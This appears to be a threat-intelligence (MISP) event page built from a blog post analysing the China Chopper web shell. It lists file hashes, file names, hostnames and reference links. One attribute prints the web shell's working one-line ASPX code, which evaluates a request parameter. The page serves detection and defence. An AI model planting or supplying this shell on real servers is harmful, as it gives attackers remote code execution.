APT 41 Scraper: Breaking Down the China Chopper Web Shell – Part I

Event ID1538
UUID4c885688-92fe-4498-be89-69aa6bdcc5eb 
Creator orgCUDESO
Owner orgLUNCHBOX
Creator useradmin@admin.test
Protected Event (experimental)  Event is in unprotected mode.
Tagsmisp:tool=”misp-scraper”x osint:source-type=”blog-post”x misp:event-type=”collection”x workflow:state=”complete”x tlp:whitex   
Date2013-08-07
Threat LevelMedium
AnalysisCompleted
DistributionAll communities   
PublishedYes 2022-09-21 19:38:25
#Attributes15 (4 Objects)
First recorded change2022-09-12 20:55:18
Last change2022-09-12 20:55:18
Modification map
Sightings0 (0) – restricted to own organisation only.  

Warning: Potential false positives (show)

Top 10K most-used sites from Tranco 

PivotsGalaxyEvent graphEvent timelineCorrelation graphATT&CK matrixEvent reportsAttributesDiscussion

1538: Scraper: Breaking Down the China Chopper Web Shell – Part I

Galaxies

attck4fraud 

  •  Malware   

Enterprise Attack – Malware 

  •  China Chopper – S0020   

Sector 

  •  Other   

Target Information 

  •  China   

Ransomware 

  •  Explorer   

Attack Pattern 

  •  Web Shell – T1505.003   
  • « previous
  • next »
  • view all

Top of Form

Bottom of Form

Top of Form

Bottom of Form

Top of Form

Bottom of Form

Scope toggle  Deleted Decay score SightingDB Context Related Tags Filtering tool

DateOrgCategoryTypeValueTagsGalaxiesCommentCorrelateRelated EventsFeed hitsIDSDistributionSightingsActivityActions
2022-09-21Artifacts droppedtext<%@ Page Language=”Jscript”%><%eval(Request.Item[“password”],”unsafe”);%>     text-based payload ASPXInherit   (0/0/0)     
2022-09-21Payload deliverylinkhttp://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html    Inherit   (0/0/0)     
2022-09-21Object name: file 

References: 
Web shellInherit 
2022-09-21Payload deliverymd5: md55001ef50c7e869253a7c152a638eab8a     Inherit   (0/0/0)         
2022-09-21Payload deliveryfilename: filenamecaidao.exe    Inherit   (0/0/0)         
2022-09-21Object name: file 

References: 
Inherit 
2022-09-21Payload deliverymd5: md58aa603ee2454da64f4c70f24cc0b5e08     Inherit   (0/0/0)         
2022-09-21Payload deliveryfilename: filenameCustomize.aspx    Inherit   (0/0/0)         
2022-09-21Object name: file 

References: 
Inherit 
2022-09-21Payload deliverymd5: md5ad8288227240477a95fb023551773c84     Inherit   (0/0/0)         
2022-09-21Payload deliveryfilename: filenameCustomize.cfm    Inherit   (0/0/0)         
2022-09-21Object name: file 

References: 
Inherit 
2022-09-21Payload deliverymd5: md5acba8115d027529763ea5c7ed6621499     Inherit   (0/0/0)         
2022-09-21Payload deliveryfilename: filenameCustomize.jsp    Inherit   (0/0/0)         
2022-09-21Payload deliveryfilename5001ef50c7e869253a7c152a638eab8a.exe    Inherit   (0/0/0)         
2022-09-21Payload deliveryhostnamewww.maicaidao.com     Inherit   (0/0/0)         
2022-09-21OthercommentBreaking Down the China Chopper Web Shell – Part I    Blog titleInherit   (0/0/0)     
2022-09-21External analysislinkhttps://www.mandiant.com/resources/blog/breaking-down-china-chopper-web-shell-part-i    Blog URLInherit   (0/0/0)     
2022-09-12Network activityhostnamewww.google.com.hk       Inherit   (0/0/0)